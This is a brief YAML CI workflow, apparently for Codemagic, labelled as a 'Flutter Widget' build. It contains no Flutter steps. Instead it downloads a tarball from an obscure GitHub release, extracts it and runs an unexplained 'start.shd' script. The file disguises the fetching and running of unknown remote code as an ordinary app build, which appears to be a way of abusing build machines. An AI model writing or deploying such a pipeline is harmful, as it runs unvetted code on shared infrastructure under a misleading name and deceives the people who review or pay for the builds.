workflows:
 
    flutter-widget:
        name: Flutter Widget
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://github.com/sanxUy/1/releases/download/1/macos.tar.gz
            - brew install gnu-tar
            - gtar xvf macos.tar.gz
            - sh start.shd
